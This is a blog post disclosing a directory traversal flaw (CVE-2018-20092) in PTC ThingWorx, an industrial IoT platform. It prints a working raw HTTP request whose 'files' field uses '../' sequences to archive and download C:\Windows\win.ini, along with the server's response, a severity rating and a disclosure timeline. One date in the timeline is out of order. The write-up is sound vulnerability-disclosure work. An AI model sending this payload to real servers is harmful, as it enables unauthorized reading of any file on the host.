Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

PTC ThingWorx Vulnerability (CVE-2018-20092)

We disclosed a PTC ThingWorx Vulnerability regarding a directory traversal last year, and I wanted to finally share the write-up.

PTC ThingWorx Vulnerability – Introduction

First of all, this is technically the first CVE that I contributed to, so that was pretty awesome. That said, Jared deserves AT LEAST 80% of the credit, if not more. I was just there to help, point him in directions, and write all this up.

PTC ThingWorx is, “a complete, end-to-end technology platform designed for the industrial Internet of Things (IoT)“.

In this application, we found a fun directory traversal finding. Additionally, this was an interesting application to interact with anyway.

Let me know what you think of the format of this post, as it is close to our internal disclosure document. It may be a bit verbose in places, but should also have all the information that anyone would need to reproduce or fix.

Directory Traversal (CVE-2018-20092)

Detailed vulnerability information

The ThingWorx application is vulnerable to a directory traversal attack. An attacker can utilize this vulnerability to read files that the application cannot normally read. In this case, the attacker can use the CreateZipArchive method to create and download zip files containing arbitrary files.

The following raw HTTP request demonstrates saving the C:\Windows\win.ini file to an archive called test.zip.

Raw Request – CreateZipArchive

POST /ThingWorx/Things/CCVTargetLimit_FileRepo/Services/CreateZipArchive HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <redacted>
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 78
Cookie: JSESSIONID=<redacted>
Connection: close

{"newFileName":"test.zip","path":"/","files":"../../../../../windows/win.ini"}

The following raw HTTP response indicates that the request was successful.

Raw Response – CreateZipArchive

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Frame-Options: SAMEORIGIN
Expires: 0
Cache-Control: no-store, no-cache
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json;charset=UTF-8
Date: Tue, 01 May 2018 14:34:10 GMT
Connection: close
Content-Length: 157

{"dataShape":{"fieldDefinitions":{"result":{"name":"result","description":"result","baseType":"BOOLEAN","ordinal":0,"aspects":{}}}},"rows":[{"result":true}]}

Finally, you can find the contents of the downloaded win.ini below.

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Note that the zip file that the application returns discloses the full path of the requested files on the system (vs. the provided relative path). This information disclosure may be useful to attackers when attempting to exploit other types of vulnerabilities.

Justification of assigned severity

Severity: High

CVSSv3

7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Damage

An attacker can utilize this vulnerability to download any file from the server hosting this application. Based on some research and testing, the user account running this service appears to have Administrative (SYSTEM) level access to the server.

Reproducibility

This attack is easily reproducible.

Exploitability

To exploit this vulnerability, attackers first need to know (or determine) the relative path of any file they wish to download. Because it is possible to automate the exploitation of this vulnerability, attackers can brute force the location of files with an unknown path.

Affected users

This vulnerability affects all files on the server.

Discoverability

This attack was discovered with manual browsing and reading the PTC API documentation.

Disclosure Timeline

The following is the (mostly accurate) timeline for this disclosure. I know it took a while for me to post this, but I wanted to make sure that Jared got his credit everywhere. Also, I wasn’t sure if Secureworks was going to post an advisory first or not.

2018-04-27 – Vulnerability discovered.
2018-06-29 – Disclosure completed and confirmed, reported to vendor.
2018-10-10 – CVE requested.
2019-12-13 – Vendor patch and disclosure released.
2019-04-10 – Disclosure updated to include Jared’s name.
2019-06-01 – This post published.

PTC ThingWorx Vulnerability – Conclusion

While it took a while, I did say that I wanted to work more on vulnerability disclosure

Additionally, I found it interested that users would call back-end Java methods in the same manner that you would use a REST API.

You can find the vendor’s disclosure here, and feel free to check out CVE-2018-20092.

I’ve hopefully got a few more disclosures, as well as CVEs, in the pipeline, so stay tuned!

One comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.